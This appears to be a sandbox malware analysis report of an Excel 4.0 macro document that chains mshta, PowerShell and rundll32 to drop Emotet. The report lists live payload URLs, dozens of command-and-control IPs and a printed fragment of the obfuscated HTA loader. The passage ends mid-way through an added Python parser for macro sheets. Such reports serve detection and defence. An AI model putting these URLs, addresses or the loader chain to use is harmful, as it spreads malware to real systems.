                            Process tree (numbers after a process name are the graph's per-process counters):
                            EXCEL.EXE 53 12
                                dropped: C:\Users\user\Desktop\DOCUMENT_2801.xls, Composite
                                signature: Passes commands via pipe to a shell (likely to bypass AV or HIPS)
                                cmd.exe
                                    cmd.exe
                                        mshta.exe 11
                                            network: 91.240.118.172, ports 49165, 49166, 80, GLOBALLAYER NL (unknown)
                                            powershell.exe 12 7
                                                network: tamiladsense.com 136.0.111.15, ports 49167, 80, AS40676 US (United States)
                                                dropped: C:\ProgramData\Milossd.dll, PE32
                                                signature: Powershell drops PE file
                                                cmd.exe
                                                    rundll32.exe
                                                        rundll32.exe 1
                                                            dropped: C:\Windows\...\kisyfwhhvxv.tpx (copy), PE32
                                                            signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                                                            rundll32.exe
                                                                rundll32.exe 1
                                                                    signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                                    cmd.exe

                            Detection for the submitted sample (Source | Detection | Scanner | Label)
                            DOCUMENT_2801.xls | 17% | ReversingLabs | Document-Excel.Trojan.Heuristic

                            Detection for the dropped file (Source | Detection | Scanner)
                            C:\ProgramData\Milossd.dll | 100% | Joe Sandbox ML
                            Detection for the contacted domain (Source | Detection | Scanner)
                            tamiladsense.com | 8% | Virustotal
                            Contacted domain (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
                            tamiladsense.com | 136.0.111.15 | true | true | - | unknown

                            Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
                            http://91.240.118.172/ee/ss/se.html | true | Avira URL Cloud: malware | unknown
                            http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/ | true | Avira URL Cloud: malware | unknown
                            http://91.240.118.172/ee/ss/se.png | true | Avira URL Cloud: malware | unknown

                            URLs from memory dumps (Name | Source | Malicious | Antivirus Detection | Reputation)
                              unknown
                              http://onexone.epowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://vn.minino.com/wp-admin/cpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://tunbridgeservices.com/jfoeqhxz/zOX0/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/ee/ss/se.htmlfunctionmshta.exe, 00000006.00000003.415186421.000000000314D000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.piriform.com/ccleanerpowershell.exe, 00000008.00000002.663093888.0000000000277000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://secure.comodo.com/CPS0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://91.240.11xrundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://crl.entrust.net/2048ca.crl0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://engaz.shopowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://74.207.230.120/drundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
207.148.81.119 | unknown | United States | 20473 | AS-CHOOPAUS | true
104.131.62.48 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
198.199.98.78 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
194.9.172.107 | unknown | unknown | 207992 | FEELBFR | true
59.148.253.194 | unknown | Hong Kong | 9269 | HKBN-AS-APHongKongBroadbandNetworkLtdHK | true
74.207.230.120 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
103.41.204.169 | unknown | Indonesia | 58397 | INFINYS-AS-IDPTInfinysSystemIndonesiaID | true
85.214.67.203 | unknown | Germany | 6724 | STRATOSTRATOAGDE | true
191.252.103.16 | unknown | Brazil | 27715 | LocawebServicosdeInternetSABR | true
168.197.250.14 | unknown | Argentina | 264776 | OmarAnselmoRipollTDCNETAR | true
185.148.168.15 | unknown | Germany | 44780 | EVERSCALE-ASDE | true
66.42.57.149 | unknown | United States | 20473 | AS-CHOOPAUS | true
139.196.72.155 | unknown | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | true
217.182.143.207 | unknown | France | 16276 | OVHFR | true
136.0.111.15 | tamiladsense.com | United States | 40676 | AS40676US | true
203.153.216.46 | unknown | Indonesia | 45291 | SURF-IDPTSurfindoNetworkID | true
159.69.237.188 | unknown | Germany | 24940 | HETZNER-ASDE | true
116.124.128.206 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
37.59.209.141 | unknown | France | 16276 | OVHFR | true
78.46.73.125 | unknown | Germany | 24940 | HETZNER-ASDE | true
210.57.209.142 | unknown | Indonesia | 38142 | UNAIR-AS-IDUniversitasAirlanggaID | true
185.148.168.220 | unknown | Germany | 44780 | EVERSCALE-ASDE | true
54.37.228.122 | unknown | France | 16276 | OVHFR | true
185.168.130.138 | unknown | Ukraine | 49720 | GIGACLOUD-ASUA | true
190.90.233.66 | unknown | Colombia | 18678 | INTERNEXASAESPCO | true
142.4.219.173 | unknown | Canada | 16276 | OVHFR | true
54.38.242.185 | unknown | France | 16276 | OVHFR | true
195.154.146.35 | unknown | France | 12876 | OnlineSASFR | true
195.77.239.39 | unknown | Spain | 60493 | FICOSA-ASES | true
78.47.204.80 | unknown | Germany | 24940 | HETZNER-ASDE | true
118.98.72.86 | unknown | Indonesia | 7713 | TELKOMNET-AS-APPTTelekomunikasiIndonesiaID | true
37.44.244.177 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
91.240.118.172 | unknown | unknown | 49453 | GLOBALLAYERNL | true
62.171.178.147 | unknown | United Kingdom | 51167 | CONTABODE | true
128.199.192.135 | unknown | United Kingdom | 14061 | DIGITALOCEAN-ASNUS | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562416
Start date: 28.01.2022
Start time: 21:14:11
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 42s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: DOCUMENT_2801.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@25/9@1/35
                                    EGA Information:
                                    • Successful, ratio: 75%
                                    HDC Information:
                                    • Successful, ratio: 29.4% (good quality ratio 27.8%)
                                    • Quality average: 72.2%
                                    • Quality standard deviation: 25.5%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xls
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 92.123.101.187, 92.123.101.210, 92.123.101.218, 92.123.101.179, 92.123.101.225, 92.123.101.169, 92.123.101.211
                                    • Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target mshta.exe, PID 2696 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 1708 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:14:19 | API Interceptor | 60x Sleep call for process: mshta.exe modified
21:14:22 | API Interceptor | 432x Sleep call for process: powershell.exe modified
21:14:39 | API Interceptor | 205x Sleep call for process: rundll32.exe modified
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 557056
Entropy (8bit): 7.0041357928485235
Encrypted: false
SSDEEP: 6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGZUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnqyDx6BrWt
MD5: 900A5B681C016FE03EECB59DBC4855A4
SHA1: A96CD94DF4DD7A76F636866E9C79E995E1175F2A
SHA-256: B77B1E649BFF7CC04B78717A35B00CE24441B09F977098B39E31A716BE5E8CAD
SHA-512: 4E0FC66FC0D8672B2A7523329D4A0BC60A664EDEC062C59305DF40CADB890ADE1ED7FAE2C893445C9D199FBCECECC508349D6D3B32DA351EFB7F9A09DE1A24E1
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\Milossd.dll, Author: Joe Security
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\mshta.exe
File Type: data
Category: downloaded
Size (bytes): 11047
Entropy (8bit): 6.178820492137629
Encrypted: false
SSDEEP: 192:aY2WCkQxAJoZ3LRtPBOEIZkh4ShBlFbClc5dkmYsWAiurnCbNPty2P933Gi7bOaI:aYSkuXxOEkkh4glslcGbu7CbRVGradod
MD5: 9CE5F4CBB12B6E393A35F5135C369C48
SHA1: 934F8045C0CDE6ED88BAE93C5541808B02129C4C
SHA-256: D2F41D2E5D866522A11D6632CFBC52F9FC4649E7EFE78F588C218E5C59C4511A
SHA-512: A53D222AE62B9AC4073357E78EB0215974E05B1145AC864B60A3CC98FF15299EA3BD0C6445A9AF90FA5A7BC88435493CEF768938A70A8FCEE204F1ADC0A65AD6
Malicious: false
IE Cache URL: http://91.240.118.172/ee/ss/se.html
                                    Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';jP645E8Mp8TPT=new Array();oV511BYRuo2ih=new Array();oV511BYRuo2ih[0]='g%78%69%6E\103%38%38\117' ;jP645E8Mp8TPT[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.%.7.6.%.6.1.\\.1.6
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.1464700112623651
Encrypted: false
SSDEEP: 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5: 72F5C05B7EA8DD6059BF59F50B22DF33
SHA1: D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256: 1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512: 6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious: false
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 28672
Entropy (8bit): 3.4082156922514875
Encrypted: false
SSDEEP: 768:XxIk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJZ6ypPn:XxIk3hbdlylKsgqopeJBWhZFGkE+cL2S
MD5: 20919860D1102256C795CB59C08178AE
SHA1: E5F6D7A600E9AE82F355A13342C981EBD98517CD
SHA-256: 7560DC6FC4A3C43879C4087FE5806DBC6B69B9F144D5A96822020D16A407B7AA
SHA-512: DDC8B8B97D8D56629133F9FEF12C1E033933B06ECEDF815C99DE1FFE78DF15FFBF9073E00FDFA715C95D4201872EE528E54E824745152DA95C5C85CBAEE6F89E
Malicious: false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.5813271999656315
Encrypted: false
SSDEEP: 96:chQCQMqWqvsqvJCwo5z8hQCQMqWqvsEHyqvJCworXzdTYzH6UVMWlUVjA2:cWzo5z8WnHnorXzdPUVMRA2
MD5: 9EB84C4053A11C348C20FE0BEBBE23DB
SHA1: 898D07BC06C9B6492DC33B6B84194CB24D7F3C6E
SHA-256: E9844BB96479944A1EC583F985D66D3AD8B7470AE060F625EFB6C92B76E9867F
SHA-512: 01A40427A7E65AE489DC1832494A6D43C73D7A4C6DAB3B3E572185889DD064878EC8F127C22CEC61E6017589D5C318512B84AE2884B1589DBF27DE25A3C98C6F
Malicious: false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.5813271999656315
Encrypted: false
SSDEEP: 96:chQCQMqWqvsqvJCwo5z8hQCQMqWqvsEHyqvJCworXzdTYzH6UVMWlUVjA2:cWzo5z8WnHnorXzdPUVMRA2
MD5: 9EB84C4053A11C348C20FE0BEBBE23DB
SHA1: 898D07BC06C9B6492DC33B6B84194CB24D7F3C6E
SHA-256: E9844BB96479944A1EC583F985D66D3AD8B7470AE060F625EFB6C92B76E9867F
SHA-512: 01A40427A7E65AE489DC1832494A6D43C73D7A4C6DAB3B3E572185889DD064878EC8F127C22CEC61E6017589D5C318512B84AE2884B1589DBF27DE25A3C98C6F
Malicious: false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:33:44 2022, Last Saved Time/Date: Fri Jan 28 07:31:35 2022, Security: 0
Category: dropped
Size (bytes): 91648
Entropy (8bit): 6.8970131412860605
Encrypted: false
SSDEEP: 1536:ZxIk3hbdlylKsgqopeJBWhZFGkE+cL2NdA/6yH5Eb7EdrpFkkGX/sGC6ORQQDBhO:ZSk3hbdlylKsgqopeJBWhZFGkE+cL2NH
MD5: 8A307768DFEF529EFD715E73A760B6F6
SHA1: 85D4535736310A907B2FF366291B65DB50B3453F
SHA-256: FCE66FFF96A52981013AF7D73751A1A7B46EC5DD007D5390903B60A60B714CF5
SHA-512: BCAFD16F994C49AE1407D0FA4D38049D7300130EDB88E1C0629EC6D3962964265E48AAF4AF9096AB7795F1635B2C0EAE378736BA8843F43634105941749F8554
Malicious: true
Yara Hits:
• Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, Author: John Lambert @JohnLaTwC
• Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, Author: Joe Security
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.*.h...6..........C.a.l.i.b.r.i. .L.i.g.h.t.1.
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):557056
                                    Entropy (8bit):7.0041357928485235
                                    Encrypted:false
                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGZUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnqyDx6BrWt
                                    MD5:900A5B681C016FE03EECB59DBC4855A4
                                    SHA1:A96CD94DF4DD7A76F636866E9C79E995E1175F2A
                                    SHA-256:B77B1E649BFF7CC04B78717A35B00CE24441B09F977098B39E31A716BE5E8CAD
                                    SHA-512:4E0FC66FC0D8672B2A7523329D4A0BC60A664EDEC062C59305DF40CADB890ADE1ED7FAE2C893445C9D199FBCECECC508349D6D3B32DA351EFB7F9A09DE1A24E1
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................
                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:33:44 2022, Last Saved Time/Date: Fri Jan 28 07:31:35 2022, Security: 0
                                    Entropy (8bit):6.862007600534603
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 78.94%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                    File name:DOCUMENT_2801.xls
                                    File size:92340
                                    MD5:3f397d9cca325167d86d575896d40207
                                    SHA1:54b8106c1715eb58230371fa033cbdec1e3aaeff
                                    SHA256:f695adbe8668cdef7b307bc0fc89a664d8002b42dc91b8a01a75aec4cfc9018c
                                    SHA512:ab12fc057dae37f8a39092ee4995a114dca0641041408b09514346e7b474bae4e35d283c7e8e31ca120a88563c6c5e35c6ecd50bd633a4dc7202641158357946
                                    SSDEEP:1536:8xIk3hbdlylKsgqopeJBWhZFGkE+cL2NdA/6yH5Eb7EdrpFkkGX/sGC6ORQQDBh+:8Sk3hbdlylKsgqopeJBWhZFGkE+cL2Nx
                                    File Content Preview:........................>......................................................................................................................................................................................................................................
                                    Icon Hash:e4eea286a4b4bcb4
                                    Document Type:OLE
                                    Number of OLE Files:1
                                    Has Summary Info:True
                                    Application Name:Microsoft Excel
                                    Encrypted Document:False
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:
                                    Flash Objects Count:
                                    Contains VBA Macros:True
                                    Code Page:1251
                                    Author:xXx
                                    Last Saved By:xXx
                                    Create Time:2022-01-27 23:33:44
                                    Last Saved Time:2022-01-28 07:31:35
                                    Creating Application:Microsoft Excel
                                    Security:0
                                    Document Code Page:1251
                                    Thumbnail Scaling Desired:False
                                    Company:
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:1048576
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.319071371437
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . M a c r o 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 aa 00 00 00
                                    General
                                    Stream Path:\x5SummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.262870751343
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . R . . . . @ . . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                    General
                                    Stream Path:Workbook
File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the stream opens with a BIFF8 BOF record, 09 08 10 00 00 06 05 00 = record type 0x0809, length 16, BIFF version 0x0600, substream type 0x0005 workbook globals, i.e. an ordinary Excel 97-2003 Workbook stream)
                                    Stream Size:81211
                                    Entropy:7.38151716612
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . X a & 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
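The Workbook stream preview above can be read directly as BIFF8 records. The walker below is an added example, not part of the Joe Sandbox report: it consumes the bytes printed in Data Raw above, identifies the BOF record (the bytes the "Applesoft BASIC" label misreads), recovers the WRITEACCESS author string "xXx", and then reads BOUNDSHEET records to flag hidden Excel 4.0 macro sheets. Only the first five record headers come from the report; the WRITEACCESS padding, the two BOUNDSHEET records ("Sheet1" and "Macro3", the names visible in the DocumentSummaryInformation stream above, with Macro3 hidden as the macro listing below reports) and the EOF record are constructed for illustration.

```python
"""Walk the BIFF8 records of an Excel 97-2003 Workbook stream and flag hidden macro sheets.

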